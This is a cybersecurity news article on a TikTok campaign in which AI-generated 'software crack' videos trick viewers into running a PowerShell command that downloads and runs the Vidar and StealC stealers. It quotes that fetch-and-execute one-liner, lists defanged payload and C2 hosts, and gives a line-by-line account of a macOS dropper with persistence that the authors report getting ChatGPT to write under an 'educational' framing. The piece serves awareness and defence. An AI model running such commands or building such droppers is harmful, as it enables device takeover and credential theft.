Emerging Threats

AI-generated TikTok tutorials are spreading stealer malware

Ray Fernandez

May 30, 20258 min read

AI-generated TikTok tutorials are spreading stealer malware (Header image)

Cybercriminals are using a new technique to target users via TikTok videos. The technique is part of a wider trend in which hackers trick users into running malicious scripts on their computers. 

ClickFix cyberattacks, clickjacking, and fake Captcha threats are on the rise. This new wave of cyberattacks uses a more remote type of social engineering (never contacting the user directly) to convince victims to run code they should not run. 

Now, this technique is spreading through TikTok, where threat actors use AI-generated videos of fake pirated software installation guides, including Spotify, Microsoft Office, and Windows OS.

While this particular threat is not targeting Apple devices yet, in this report, we look at how easily that can change, as well as how the attack works. 

TrendMicro uncovers a new technique on TikTok that’s frighteningly simple and dangerous 

Recently, TrendMicro found a new social engineering campaign that leverages TikTok to distribute the Vidar and StealC information stealers. These are both Windows malware, but bear with us, as we will explain why Apple users should care about this news. 

TrendMicro shared screenshots of identified TikTok users and videos spreading Vidal and StealerC with a novel social engineering technique.
TrendMicro shared screenshots of identified TikTok users and videos spreading Vidal and StealerC with a novel social engineering technique. Image: Screenshot, Moonlock.

One of the big problems with this campaign is TikTok itself. Once threat actors figure out how to use the social media platform to distribute malware, a campaign can spread like wildfire due to TikTok’s high exposure algorithms.

In this particular campaign, the videos on TikTok have absolutely no malware or hidden code in them. They just contain deceiving instructions for victims to follow. 

The videos also appear to have been made using generative AI apps. The use of AI combined with the reach that TikTok’s algorithms would allow cyber criminals to scale this operation significantly, churning out one video after another and reaching hundreds of thousands of users.

Any user or enterprise that follows the instructions in these TikTok videos is at risk of losing control of their device, having their data stolen, or being spied upon. The simplicity of this cyberattack, which only requires users to run a simple line of code, is also of high concern.

Furthermore, using AI coding assistance, we will demonstrate in the sections below that this technique can be adapted to target macOS environments in just a couple of minutes. But before we get into that, let’s outline this new campaign that abuses the popularity of the Asian social media giant. 

A new type of social engineering is on the rise

These TikTok-based campaigns use social engineering entirely within video content. As TrendMicro explained, “The social engineering occurs within the video itself, rather than through detectable code or scripts — there is no malicious code present on the platform for security solutions to analyze or block.” 

This TikTok PowerShell cyberattack works as follows:

  1. A user first finds a video on TikTok (promoted as software cracks for Microsoft products, Spotify, and CapCut in this campaign). 
  2. The TikTok video is short and contains simple instructions on how to “crack software.” 
  3. An example of the instructions that appeared in one of the videos in this campaign was as follows:
    1. Press Windows + R.
    2. Type “powershell” and press Enter.
    3. Execute the following command:
      • iex (irm hxxps://allaivo[.]me/spotify).
    4. A victim who follows the instructions will be running a PowerShell command. 
  4. The PowerShell command will download and execute a remote script, eventually compromising the victim’s system.

The PowerShell command downloads and executes a script (SHA256: b8d9821a478f1a377095867aeb2038c464cc59ed31a4c7413ff768f2e14d3886) from hxxps://allaivo[.]me/spotify.

A breakdown of the script and attack chain 

The first thing the script does is hide directories within the user’s APPDATA and LOCALAPPDATA folders. It adds these hidden directories to the exclusion list of Windows Defender (the Windows built-in anti-malware). This basically means that the anti-malware will not check these folders for suspicious activity or malware. 

Next, the script will direct the system to a website (for example, hxxps://amssh[.]co/file.exe), where it hosts the secondary payload. In this campaign, this payload was the stealer malware Vidar and StealC. 

The script saves the malware in the hidden (and excluded from anti-malware) folders that it created. It then runs more scripts (always in the hidden folder), executes the malware, and changes the registry process to establish long-term persistence.

The malware also establishes communication between the victim’s device and an attacker-controlled C2 server where the victim’s stolen data will be sent. 

A screenshot of the code that the PowerShell command triggers on Windows devices.
TrendMicro shared the code that the PowerShell command triggers on Windows devices. Image: Screenshot, Moonlock.

Attacker-controlled C2 servers identified in this campaign include: 

  • hxxps://steamcommunity[.]com/profiles/76561199846773220 (Vidar)
  • hxxps://t[.]me/v00rd (Vidar) 
  • hxxp://91[.]92[.]46[.]70/1032c730725d1721[.]php (StealC)

“The script deletes temporary folders to minimize forensic traces, while robust error handling ensures the infection chain proceeds smoothly,” TrendMicro explained. 

Who is behind the TikTok stealer campaign?

TrendMicro identified several users spreading malware on TikTok using this technique, including TikTok users @gitallowed @zane.houghton, @allaivo2, @sysglow.wow, @alexfixpc, and @digitaldreams771. 

Moonlock confirmed that all these accounts are no longer active but found other videos offering cracked software, PowerShell command guides, and similar content. This means that users on the platform are looking for this type of video, and they could be exposed to similar threat campaigns.   

According to TrendMicro, the malicious videos attracted a lot of attention, with one of them gaining over 20,000 likes, more than 100 comments, and nearly half a million views. 

Unfortunately, TrendMicro says that with no malicious code embedded, detecting malicious actions relies on monitoring user behavior.

Detecting malware and suspicious activity in video explanations is virtually impossible without closely monitoring activity on TikTok. This makes this technique a nightmare for security teams and cybersecurity experts. 

Why should I care? I have a Mac and use Apple devices

We have been witnessing the increase of ClickFix, fakeCaptcha, clickjacking, and other social engineering threats that convince users that it is a good idea to run scripts on their devices. These campaigns began targeting Windows devices but have now adapted to breach Apple environments as well. 

The truth is that it is scary simple to write a malicious script that would use this technique to breach a Mac, even if the bad actors have little or no knowledge of coding at all.

To prove this and demonstrate how easy it is, we used ChatGPT to adapt this malicious technique to target macOS. 

Some notable differences between this technique on Windows and on Mac include bypassing and excluding folders and files from Gatekeeper (Apple’s built-in anti-malware) instead of Windows Defender and the use of bash instead of PowerShell scripts (because by default, PowerShell is installed on Macs). However, in concept, the attack chain and vector are the same. 

First, we showed ChatGPT how the new Windows-targeting technique on TikTok worked, along with its malicious scripts. We then asked it to develop a stealthy macOS payload to be used solely as an example for awareness and education purposes, not for malicious use.

The script had to simulate a fake Spotify “crack” using a technique that used native macOS tools, could realistically bypass average user defenses, and would appear harmless at a glance in order to trick victims. 

How the malicious scripts work on a Mac

A screenshot of the ChatGPT trigger that would work on macOS.
We asked ChatGPT to generate a one-liner trigger that would work on macOS. Image: Screenshot Moonlock.

ChatGPT came up with the following. A threat actor could use these instructions in a video on TikTok to trick macOS users into running this code. 

To install a cracked version of Spotify on your Mac: 

  • Step 1: Open Terminal on your Mac: Go to your Applications > Utilities > Terminal.
  • Step 2: Copy and paste this command and press Enter.
  • Step 3: Wait a few seconds. You’ll see a message like: “Spotify Premium Activated.”

The file hosted at hxxps://example[.]com/spotify-crack, which the one-liner triggers access to, would then need to contain the following code. 

A screenshot of the code generated by ChatGPT to apply this technique to macOS systems.
The code generated by ChatGPT to apply this technique to macOS systems. Code generated for educational and awareness purposes only. Image: Screenshot Moonlock.

The code could be obfuscated and heavily tweaked to bypass Gatekeeper security guardrails. It can also be modified to obfuscate the URLs, compress the payload, or retrieve malware stored on platforms like GitHub, Discord, etc. 

What the script does on a Mac

If you were to copy this script on your Mac, this is what it would do: 

  • Lines 1–2 pretend that it’s a Spotify crack.
  • Lines 3–5 define key file paths:
    • A hidden directory to store the payload
    • A LaunchAgent plist path for persistence
    • The URL where the fake Spotify binary will be downloaded from
  • Line 6 defines the local path where the payload binary will be saved.
  • Line 8 creates the hidden directory ~/Library/Application Support/.spotifyhelper if it doesn’t exist.
  • Line 9 downloads the malicious binary from the specified URL into the hidden folder.
  • Line 10 makes the downloaded binary executable.
  • Line 11 removes macOS quarantine flags to bypass the Gatekeeper warning.
  • Lines 13–25 create a LaunchAgent plist file:
    • It tells macOS to auto-run the payload binary on every login
    • Saves this plist to ~/Library/LaunchAgents/com.spotify.helper.plist
  • Line 27 loads the LaunchAgent into macOS’s launch system (establishes persistence).
  • Line 28 displays a fake success message to trick the user.

Code returned from a ChatGPT prompt

To establish persistence, ChatGPT gave us the following bash code. 

A screenshot of the bash script generated by ChatGPT.
ChatGPT generated a bash script for macOS in seconds to establish the persistence of malware in a system. Image: Screenshot, Moonlock.

This script would: 

  • Log to ~/Library/Logs/spotifyhelper.log
  • Append a new “ping” line every 60 seconds
  • Mimic C2 behavior without any actual networking or harm

Running code from user-space directories like /tmp, /Users, etc, using scripts to remove Gatekeepers’ quarantine flags, or manipulating file permissions could also help a hacker increase the success of this kind of cyberattack. 

The scripts and code provided by ChatGPT appear to be fully functional but should not be tested by users. This technique is potentially damaging.

We share the code and scripts solely for the purpose of awareness and education and to provide a clear picture of how new AI tools can help create rough drafts for scripts in seconds, which can then be rapidly tested with different variants and eventually scaled to go after Apple users.  

Final thoughts

As you can see, a simple line of code can trigger a devastating domino effect, breaching devices and resulting in big risks for users. These scripts, which can be generated by any public AI model, significantly lower the technical bar that cybercriminals need to launch attacks.

These types of cyberattacks are on the rise. As a rule of thumb, never run code on your terminal unless you know exactly what you are doing. Remember, prevention is your best defense.

This is an independent publication, and it has not been authorized, sponsored, or otherwise approved by Apple Inc. Mac and macOS are trademarks of Apple Inc.

MoonLock Banner
Ray Fernandez Ray Fernandez
Ray has been covering tech and cybersecurity for over 15 years. His work has appeared on TechRepublic, VentureBeat, Forbes, Entrepreneur, and the Microsoft Blog, among others.